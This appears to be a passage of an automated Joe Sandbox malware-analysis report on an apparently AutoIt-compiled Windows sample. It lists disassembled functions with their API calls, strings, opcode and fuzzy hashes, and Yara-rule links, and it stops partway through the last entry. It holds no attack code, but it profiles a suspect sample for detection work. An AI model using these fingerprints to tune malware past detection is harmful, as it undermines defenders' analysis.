Opcode ID: 91343ce23a2b0fc4daf423e511c6b14146e21eec95619bc0bd3715727287c91d
Instruction ID: bb03afeb212698a245bd36115280ab38e59fc8866350573828fd2a5dba7d29dd
Opcode Fuzzy Hash: 91343ce23a2b0fc4daf423e511c6b14146e21eec95619bc0bd3715727287c91d
Instruction Fuzzy Hash: E121603250021DABDF11CFA4DC46FEE3B69EB48724F110214FE556B1D0DAB6BC519BA0

Function 00A07B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00A07C4A
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00A07C58
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00A07C5F

Strings

msctls_updown32, xrefs: 00A07BC4

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 92d7782d7271d8adff651190c199905619b469a057e2e2a5453854f186f61983
Instruction ID: a9998ac7d241b47ef9b47d777370273c425d8126cff13716a941c8932f0b1245
Opcode Fuzzy Hash: 92d7782d7271d8adff651190c199905619b469a057e2e2a5453854f186f61983
Instruction Fuzzy Hash: 442162B5A04109AFEB10DF64DCC1DAB37ECEF9A354B140459F9019B3A1CB72EC528BA0

Function 00A06CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00A06D3B
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00A06D4B
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00A06D70

Strings

Listbox, xrefs: 00A06D08

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 0fa2f88a8fa47e280a30435ac52c127c7abd2b47c1868e3859f68e6e48b16045
Instruction ID: d9c68a744dfb0825dd12ca3a9e959fcf82456928cbc9498c9b7de737d1e0e25a
Opcode Fuzzy Hash: 0fa2f88a8fa47e280a30435ac52c127c7abd2b47c1868e3859f68e6e48b16045
Instruction Fuzzy Hash: 4B21623261011CBFEF158F54EC45FAB3BBAEF89764F118128F9459B1E0C671AC6297A0

Function 00A0770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00A07772
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00A07787
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00A07794

Strings

msctls_trackbar32, xrefs: 00A07749

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: ae1eb9f24275e4a3161786dc4bf336d57bcaa3682c53e0939f999ff887ab7448
Instruction ID: b30f4e7946caddd5159796f77937e9d412589db54413b0b82c8cca6877be182a
Opcode Fuzzy Hash: ae1eb9f24275e4a3161786dc4bf336d57bcaa3682c53e0939f999ff887ab7448
Instruction Fuzzy Hash: 9E11C472644209BFEB209F65DC05F9B7769EF89B54F114528FA41A60D0D672A811CB20

Function 00984C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00984BD0,?,00984DEF,?,00A452F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00984C11
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00984C23

Strings

Wow64DisableWow64FsRedirection, xrefs: 00984C1D
kernel32.dll, xrefs: 00984C0C

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 960648a0c301a2c721ef4fb9bfd39c87108865e8034f6777d7d355ec3b6850d4
Instruction ID: 7d8c54d9b830aedc8c77a4eda8bba585960269b6547e3f92915e926165adb48c
Opcode Fuzzy Hash: 960648a0c301a2c721ef4fb9bfd39c87108865e8034f6777d7d355ec3b6850d4
Instruction Fuzzy Hash: B9D01231511727DFD730AFB5D908646B6D9FF09351B118C3A94C5E6650E6B0D481CB50

Function 00984C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00984B83,?), ref: 00984C44
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00984C56

Strings

Wow64RevertWow64FsRedirection, xrefs: 00984C50
kernel32.dll, xrefs: 00984C3F

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 271a71ddc81f5e7f008233fd77e70373514e0092f587459ef138f5f9895845a4
Instruction ID: d320a851f03a58dc3ece7f0df9cb70c101d434b56f82fe98f97371e00248effd
Opcode Fuzzy Hash: 271a71ddc81f5e7f008233fd77e70373514e0092f587459ef138f5f9895845a4
Instruction Fuzzy Hash: 0AD0C730900713DFCB30AF71D80824A72E8BF05340B128D3AA5D2E6AA0E670D880CB50

Function 00A00DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00A01039), ref: 00A00DF5
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00A00E07

Strings

advapi32.dll, xrefs: 00A00DF0
RegDeleteKeyExW, xrefs: 00A00E01

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: e960c4153ff312b965f62f54ece32038ab5e1dafec8f222c1ba031f9f68ee000
Instruction ID: 2c8d36350d035910810fd053e6514d837de59de0816abd71aaca14a460592c74
Opcode Fuzzy Hash: e960c4153ff312b965f62f54ece32038ab5e1dafec8f222c1ba031f9f68ee000
Instruction Fuzzy Hash: 70D0177051072ADFD7219FB5D808B8776E5AF14352F118C3EA586E2590E6B4D8D1CA50

Function 009F90E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,009F8CF4,?,00A0F910), ref: 009F90EE
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 009F9100

Strings

GetModuleHandleExW, xrefs: 009F90FA
kernel32.dll, xrefs: 009F90E9

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 8561454d6c3f254e3beaa9f50873b998d6192069ce9fede6378e01c3ab3e915e
Instruction ID: 72601bcdad64b40ad636f515ff5fb4d646157a1f70e244bbbe6efc43efbad54e
Opcode Fuzzy Hash: 8561454d6c3f254e3beaa9f50873b998d6192069ce9fede6378e01c3ab3e915e
Instruction Fuzzy Hash: 5BD0173461871BDFDB30DF71D81861676E8BF05351B128C3AA686E69A0EA74C881CB90

Function 009C1714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 009C1718
__swprintf.LIBCMT ref: 009C1749

Strings

WIN_XPe, xrefs: 009C1788
%.3d, xrefs: 009C1723

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: bb9c7dd95e8c4d84551043f94eba7afea9c8ec529bb32c2ab0c61271413616c6
Instruction ID: 357f54004ade7b4dda0a866a22aa62017405a0524baa301ff8a7b376e87a1d84
Opcode Fuzzy Hash: bb9c7dd95e8c4d84551043f94eba7afea9c8ec529bb32c2ab0c61271413616c6
Instruction Fuzzy Hash: DAD01271C4410DFBC711D7909899EF973BCA70A301F140D66B402A2141E239C755EA6A

Function 009D717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2287ac65dbcbedc6f501551c26fbabfb791d985c6080544f3f079417ba5f1a74
Instruction ID: 644f550b97e5d0a9fbc5b0cd85a8a5b5dc90696c679b928cb9416d8f7fe39a29
Opcode Fuzzy Hash: 2287ac65dbcbedc6f501551c26fbabfb791d985c6080544f3f079417ba5f1a74
Instruction Fuzzy Hash: 21C13B74A44216EFCB14CF94C884AAEFBB9FF48714B158599E805EB361E730ED81DB90

Function 009FE02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 009FE0BE
CharLowerBuffW.USER32(?,?), ref: 009FE101

Part of subcall function 009FD7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 009FD7C5

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 009FE301
_memmove.LIBCMT ref: 009FE314

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: aef93c4756228dca693944ba5d82727356c689b983074b3ddab3c0df9e1b1331
Instruction ID: 7cc60cdcf2a03c5763cf34ea914b40571d295908e011000fcfa086938a8caf1c
Opcode Fuzzy Hash: aef93c4756228dca693944ba5d82727356c689b983074b3ddab3c0df9e1b1331
Instruction Fuzzy Hash: EAC159716083059FC714DF28C480A6ABBE4FF89718F14896EF9999B361D731E946CB82

Function 009F8093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 009F80C3
CoUninitialize.OLE32 ref: 009F80CE

Part of subcall function 009DD56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 009DD5D4

VariantInit.OLEAUT32(?), ref: 009F80D9
VariantClear.OLEAUT32(?), ref: 009F83AA

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: ff554f50c03b0fe496b189f22e2c9679af4ecb6ed450ed14f3f8193ed8ae5271
Instruction ID: 4cb9db714653394e2acaf084a79080a23bcd5a983b5dc995e4d23e10868cb801
Opcode Fuzzy Hash: ff554f50c03b0fe496b189f22e2c9679af4ecb6ed450ed14f3f8193ed8ae5271
Instruction Fuzzy Hash: 2FA158356047059FCB50EF54C881B6AB7E4BF89764F08484CFA969B3A1CB34ED05CB82

Function 009D7530 Relevance: 6.2, APIs: 4, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00A12C7C,?), ref: 009D76EA
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00A12C7C,?), ref: 009D7702
CLSIDFromProgID.OLE32(?,?,00000000,00A0FB80,000000FF,?,00000000,00000800,00000000,?,00A12C7C,?), ref: 009D7727
_memcmp.LIBCMT ref: 009D7748

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 1f8fc486b669bf13ebb262982feb73b3925a26668d4a06cfdd1aab9617616a5e
Instruction ID: f039808182db8d0e788ccf724070f96f7e738d057243ad35df1f7184de96ebea
Opcode Fuzzy Hash: 1f8fc486b669bf13ebb262982feb73b3925a26668d4a06cfdd1aab9617616a5e
Instruction Fuzzy Hash: 56812A75A00109EFCB00DFE4C984EEEB7B9FF89315F208559E505AB250EB71AE06CB61

Function 009D687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 009D688E
SysAllocString.OLEAUT32(00000000), ref: 009D6937
VariantCopy.OLEAUT32 ref: 009D6966
VariantClear.OLEAUT32(?), ref: 009D698D

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: e4ea77a0b7ead498e24e9e9c0e73da21f673c3167e8b3797fc4c8e086b6b0131
Instruction ID: cf989053f8722e6e0d4627d27e262aca065d2a49c351b0083d0c3e9b74ab7298
Opcode Fuzzy Hash: e4ea77a0b7ead498e24e9e9c0e73da21f673c3167e8b3797fc4c8e086b6b0131
Instruction Fuzzy Hash: 6851A0747843029EDB24EF65D895B3AB3E9AF85310F20D81FE5D6EB392DA74D8808701

Function 00A097F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(0138CE50,?), ref: 00A09863
ScreenToClient.USER32(00000002,00000002), ref: 00A09896
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00A09903

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 105be48858937f1eee6fb4ddfeedcda5ff4630535bbe5526fa8c9926d29af060
Instruction ID: e2bb090f050d032124ff5c34087fbadb53dd8a4c2174dc1526ddf9d58cb7dcd1
Opcode Fuzzy Hash: 105be48858937f1eee6fb4ddfeedcda5ff4630535bbe5526fa8c9926d29af060
Instruction Fuzzy Hash: 86514E34A00209EFDF14DF64D980AAE7BB5FF55360F148169F865AB3A1D731AD42CB90

Function 009D9A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 009D9AD2
__itow.LIBCMT ref: 009D9B03

Part of subcall function 009D9D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 009D9DBE

SendMessageW.USER32(?,0000110A,00000001,?), ref: 009D9B6C
__itow.LIBCMT ref: 009D9BC3

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 91e68e7bf3c63af6785088e9adc57f75a9158b63a3b7b206f1d5e44289dcbd91
Instruction ID: b80bb8323cf10cbe071586b09fd1f622641bed299eecfe3e6afa3460b4bf24ad
Opcode Fuzzy Hash: 91e68e7bf3c63af6785088e9adc57f75a9158b63a3b7b206f1d5e44289dcbd91
Instruction Fuzzy Hash: 69416E74A40208ABDF21FF54D845BEEBBB9EF85714F00406AF905A7391DB749A44CBA1

Function 009F69AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 009F69D1
WSAGetLastError.WSOCK32(00000000), ref: 009F69E1

Part of subcall function 00989837: __itow.LIBCMT ref: 00989862
Part of subcall function 00989837: __swprintf.LIBCMT ref: 009898AC

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 009F6A45
WSAGetLastError.WSOCK32(00000000), ref: 009F6A51

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: 695b03f7075583fd5c5658977a77cfc93b094207d6b3b9486539af3a0333624a
Instruction ID: 700c044595bec6f8f4ad3df7492c35421c192770fdb59f3621290a9f844fd144
Opcode Fuzzy Hash: 695b03f7075583fd5c5658977a77cfc93b094207d6b3b9486539af3a0333624a
Instruction Fuzzy Hash: F5418E75740204AFEB60BF64CC86F7A77A89B84B14F48C41CFA59AF3D2DA719D018B91

Function 009F641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00A0F910), ref: 009F64A7
_strlen.LIBCMT ref: 009F64D9

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: edf0842c55450c7990c2a485c9c89cb790324e90d9dfb45e243fb7c960d2aadf
Instruction ID: b0f3639bf8c7d1b23e40081a0770c6aa91e8f49c084e890f8516ea88cdef863c
Opcode Fuzzy Hash: edf0842c55450c7990c2a485c9c89cb790324e90d9dfb45e243fb7c960d2aadf
Instruction Fuzzy Hash: 42419531600208AFCB14FBA8DC95FBEB7A9AF84314F148559F919AB392DB30AD05CB50

Function 009EB7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 009EB89E
GetLastError.KERNEL32(?,00000000), ref: 009EB8C4
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 009EB8E9
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 009EB915

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
